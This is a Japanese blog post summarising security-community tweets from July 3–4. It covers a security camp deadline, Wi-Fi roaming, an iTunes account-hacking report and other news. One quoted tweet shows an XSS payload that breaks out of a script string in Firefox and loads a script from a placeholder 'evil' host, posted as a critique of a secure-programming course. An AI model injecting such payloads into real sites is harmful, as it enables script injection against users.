スポンサーサイト


7月3~4日のtwitterセキュリティクラスタ

相変わらず週末はリアルで充実の日々を送る関係で、ツイートの少ないセキュリティクラスタです。私も今年初のかき氷なんかを食べたりしてネットとかあんまり見てないですよ。PC付けると暑いですしね。




あと7時間くらいですが、とりあえず出すのはタダなので(参加するのもタダですが)チャレンジしてみましょうよ。
hasegawayosuke: セキュリティ&プログラミングキャンプの応募締切は本日(7月5日)17:00必着ですよ。 #spcamp

sonodam: キャンプの内容って、講師自身が受けたいようなものを作ってるから、作ってる側も楽しいんだけどね(笑)。苦しいけど。とはいえセキュリティは今年けっこう変えちゃったけどね。#spcamp



引きこもりであまり使う機会はないのですが、ローミングで自分が何を使えるのかがよくわからなくなってきました。APの近所に住んでおけば日々のネット料金が安上がりですむのでうらやましいです。
mi1kman: 公衆無線LAN接続サービスもだんだん値下げされてきましたね

mi1kman: 公衆無線LAN接続サービスあちこちがローミングしてるので、分かりづらいですよね...



金曜日話題だったセキュアプログラミング講座ですが。貫通するコードが発表されています。
masa141421356: @ockeghem Firefoxだと <script> var a="//</script><script src=http://example.com/evil.js></script><script>"< /script> で陥落 > セキュアプログラミング講座



アカウントハックして自分のアプリ買うって… 誰がやったかモロバレですが、そんなに切羽詰まってたんですかねえ。アカウントってそれなりに簡単に手に入るとは思うのですが、それをバレないように使うのが大変なんだと思います。
iPad_news_tw: iTunesアカウントがハッキングされているとThe Next Webが報じる: MdN Design InteractiveThe Next Webは現地時間7月4日、iTunesのアカウントが広範囲にハッキングされて、特定の... http://bit.ly/chs2lq



名古屋とはあんまり関係ないような気はしますが。警察って自分たちよりは公務員の味方なんでしょうね。
keikuma: 読んだ。こりゃダメだ。新しい産業は愛知県からは生まれない。名古屋脱出して正解だったという感想。 RT @rocaz: ブログ書きました: とある件 #librahack に関連しつつ一般論を再度電話して聞いてみた http://goo.gl/fb/Vqbo9



一瞬クソニートカードと空目して、クソニートの僕でもカードが作れるのかとwktkしたのですが、それはともかくいったい何があったのでしょう。
HiromitsuTakagi: クソニーカードのせいで、あちこちの登録カード番号変更の作業で何時間も費やした。二度とソニー製品は買わんと決意。


スポンサーサイト

テーマ : セキュリティ
ジャンル : コンピュータ

コメントの投稿

非公開コメント

プロフィール

bogus

Author:bogus
FC2ブログへようこそ!

最新記事
最新コメント
最新トラックバック
月別アーカイブ
カテゴリ
検索フォーム
RSSリンクの表示
リンク
ブロとも申請フォーム

この人とブロともになる

QRコード
QR
カレンダー
08-2017
SUN MON TUE WED THU FRI SAT
- - 1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31 - -

07   09

